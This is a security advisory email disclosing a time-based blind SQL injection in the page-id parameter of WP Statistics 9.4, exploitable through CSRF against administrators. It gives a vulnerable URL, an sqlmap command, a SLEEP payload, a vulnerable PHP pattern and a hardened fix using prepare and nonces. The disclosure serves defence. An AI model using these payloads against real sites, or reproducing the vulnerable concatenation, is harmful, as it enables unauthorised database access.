Subject: Blind SQL injection in WP Statistics 9.4
Date: Thu, 9 Jul 2015 00:07:59 +0200
Hello,
Plugin: WP Statistics 9.4
https://wordpress.org/plugins/wp-statistics/
The affected page is only reachable by authenticated administrators, who can execute arbitrary SQL through it. Since the request carries no CSRF protection (no nonce check), an attacker can also have a logged-in administrator trigger the injection by luring them to a crafted link.
1. SQL injection (wp_statistics_pages())
Method: GET
Url: http://localhost/wp-admin/admin.php?page=wp-statistics%2Fwp-statistics.php&type=top-pages&page-id=[sqli]&page-uri=2
Vulnerable parameter: page-id
Example PHP callstack:
wp_statistics_generate_page_postbox_content [/wp-statistics/includes/log/widgets/page.php:28]
wp_statistics_pages [/wp-statistics/includes/functions/functions.php:206]
wpdb::get_var
Sqlmap verification:
sqlmap --cookie "..." --dbms mysql -u "http://localhost/wp-admin/admin.php?page=wp-statistics%2Fwp-statistics.php&type=top-pages&page-id=1&page-uri=2" -p page-id --technique T --time-sec=2
...
Parameter: page-id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=wp-statistics/wp-statistics.php&type=top-pages&page-id=1 AND (SELECT * FROM (SELECT(SLEEP(2)))ZbFW)&page-uri=2
...
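As an added illustration (not code from WP Statistics; the plugin's own source is not quoted in this report), the following PHP shows the vulnerable pattern implied by the call stack above, next to the form a WordPress plugin would normally use to close both the injection and the missing CSRF check. Only the page-id parameter and the wpdb::get_var sink come from the report; the function names, the table name, the column names, the query body and the nonce action string are assumed for the example.

```php
<?php
/*
 * Added example, not WP Statistics code. The page-id parameter and the
 * $wpdb->get_var() sink come from the advisory; every other name here
 * (functions, table, columns, nonce action) is assumed for illustration.
 */

/* Vulnerable pattern (assumed): the raw GET value is concatenated into the
 * query, so page-id=1 AND (SELECT * FROM (SELECT(SLEEP(2)))x) reaches
 * $wpdb->get_var() unchanged and MySQL evaluates the SLEEP(). */
function example_page_hits_vulnerable( $page_id ) {
    global $wpdb;
    $sql = "SELECT SUM(count) FROM {$wpdb->prefix}statistics_pages WHERE id = " . $page_id;
    return $wpdb->get_var( $sql );
}

/* Hardened form: page-id is numeric, so cast it with absint() and let
 * $wpdb->prepare() bind it with %d. The value can no longer change the
 * query structure; the payload above now simply queries id = 1. */
function example_page_hits_hardened( $page_id ) {
    global $wpdb;
    $sql = $wpdb->prepare(
        "SELECT SUM(count) FROM {$wpdb->prefix}statistics_pages WHERE id = %d",
        absint( $page_id )
    );
    return $wpdb->get_var( $sql );
}

/* CSRF: the report notes that the admin page has no CSRF protection, which
 * is what lets a third-party site drive an administrator's browser to the
 * URL. Emit the link with a nonce and verify it before touching the DB. */
function example_top_pages_link( $page_id ) {
    $url = admin_url( 'admin.php?page=wp-statistics/wp-statistics.php'
        . '&type=top-pages&page-id=' . absint( $page_id ) . '&page-uri=2' );
    return wp_nonce_url( $url, 'example_top_pages' );   // appends _wpnonce
}

function example_handle_top_pages() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // Dies unless _wpnonce is valid for this action and the current user.
    check_admin_referer( 'example_top_pages' );
    $page_id = isset( $_GET['page-id'] ) ? absint( $_GET['page-id'] ) : 0;
    echo esc_html( example_page_hits_hardened( $page_id ) );
}
```

The absint() cast alone would already defeat this particular payload; $wpdb->prepare() is kept because it is the pattern that stays safe when a non-numeric parameter is later added to the same query, and the nonce check is what removes the attack path against an administrator who never intended to visit the crafted URL.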
--
Regards,
Marcin Probola,